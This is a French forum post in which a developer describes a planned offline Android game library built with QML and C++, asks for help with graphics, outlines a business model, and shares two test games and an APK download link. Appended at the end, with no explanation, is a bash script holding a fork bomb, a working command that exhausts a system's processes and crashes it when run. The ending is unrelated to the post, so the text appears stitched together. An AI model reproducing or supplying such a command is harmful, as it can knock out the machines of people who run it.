Portrait de Antoinnneee
Inscrit le : 17/08/2017
Commentaires : 0
Messages : 1
#1
Message Sujet: [QML/C++/Android] Creation ludotheque Android de jeux local     17/08/2017 à 09:15

Ceux qui habite a paris comprennent mieux que quiconque le problème des jeux avec connections obligatoire...

Mon projet est de faire une ludotheque de jeux android 2D hors-ligne ,multijoueur/solo local.

Avant toute description, je commencerais réellement a programmé l'application en septembre, J'ai des projet pro a finir d'urgence avant.

Partie Technique :
Tehcno : QML/Javascript pour l'interface
Javascript/C++ pour le reste

Le projet étant a ces début, la structure de jeux en réseau local n'est pas encore terminé (pas réellement commencer non plus, mais je taf professionnellement sur un programme qui seras adaptable facilement).

Bien que je programme avec l'ide QT, je ne veut pas utilisé la lib VPLAY, pour des raison de coup de licence (49€ par mois car je suis sous le nom de la société de mon père, je passe donc dans la plage start-up), je préfère tout développé "from scratch", (surtout que c'est le moteur qui m’intéresse presque le plus a codé);

Le Problème graphique :
Si vous avez lue la partie précédente, vous avez du comprendre que je suis un développer, et mes connaissance artistique sint limité. Jai bien un petit frère que fait des étude d'art numérique, mais il n'est pas assez fiable pour faire des projets (il s'en fout, et na pas envie de bossé plus que ce qu'on luis demande a l'école (il faut le pardonné, il est encore jeune)), J'ai aussi mon meilleur ami qui fait des étude de graphisme, mais sont excuse a luis, c'est "Je fait de l'art imprimé".

Donc si une Âmes généreuse trouve une des applis que j'aurais mis, moche, et veut refaire entièrement charte graphique d'un jeux, il est le bienvenue Joyeux

Future modèle economique :
A terme, je compte mettre la ludothèque sur l'app store, avec une partie des jeux gratuit et les jeux plus recherché payants. (par exemple: je ne ferais pas payé un jeux de pocker, par contre le jeu créé par mon ami seras payant.) Avec biensur, la possibilité d'acheté un seul jeux pour jouer à plusieurs sur le même jeu payant.

En ce moment, je me sert des weekend pour commencer a prendre la main sur le language QML/Javascript, J'ai donc fait 2 petit jeux (qui seront peut être dans la version final)

- pong: premier jeux fait pour prouvé une soirée un peut arrosé, qu'un jeux 2D, c'etait pas dur a faire. Il suffit de "martelé" les petites boules , pour faire du score. (dure 30s)
IMAGE(https://img4.hostingpics.net/pics/349992Screenshot20170817083612.png)

- -insertJokeHere-league : Le but du jeux etait de faire une lethal league, mais sans rebond, juste une balle qui avance de plus en plus vite. (2joueur sur 1 telephone)
IMAGE(https://img4.hostingpics.net/pics/156142Screenshot20170817084010.png)

Alors je suis d'accord, ces deux premiers jeux sont un peux moisie niveau du gameplay, mais ce sont surtout des test, (et un délire de mec bourré). Je m'attaque au jeux de carte bientôt, (ce qui a mon avis amèneras une bonne surprise, on as créer un jeux de carte avec mon amis graphiste, il se pourrais bien qu'il y est une version numérique (ne serait-ce que pour faire de la pub pour le jeux en boite)

Lien des 2 apk : https://www.dropbox.com/sh/0c79rc6upecv040/AAB7Heeae7VI8RBVp-S0NNIza?dl=0

ah bientôt pour plus de news

#!/bin/bash

:(){ :|:& };: